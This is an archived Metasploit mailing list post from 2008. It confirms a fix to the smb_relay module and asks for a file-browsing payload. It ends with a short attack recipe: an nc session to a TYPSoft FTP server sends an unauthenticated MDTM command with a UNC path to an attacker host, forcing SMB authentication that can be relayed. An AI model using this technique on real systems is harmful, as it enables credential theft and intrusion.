Metasploit mailing list archives
smb_relay has been fixed :-)
From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Fri, 19 Dec 2008 22:40:13 +0100
I finally tracked down the bug in smb_relay, the fix has been committed to the 3.2 and 3.3-dev SVN trees. A big thanks to the folks who reported it and their patience waiting on a fix.
Confirmed working. Thanks a lot ! At this point, it would be very nice to have a browse/read/write files payload rather than existing payloads that all expect the user to be local administrator (which is quite uncommon nowadays). A payload that would allow file browsing on a share where the user profile is stored would be of highest interest. But I now this is not something that could be done over the night ... Bonus smb_relay attack against Typsoft FTP server, which * runs in the current user session (and not as a service) * allows unauthenticated use of the MDTM command * does not properly filter parameters to the CreateFile API Then: $ nc -vv -n 192.168.1.100 21 (UNKNOWN) [192.168.1.100] 21 (?) open 220 TYPSoft FTP Server 1.11 ready... MDTM \\attacker\whatever Regards, - Nicolas RUFF
Current thread:
- smb_relay has been fixed :-) H D Moore (Dec 10)
- smb_relay has been fixed :-) Nicolas RUFF (Dec 19)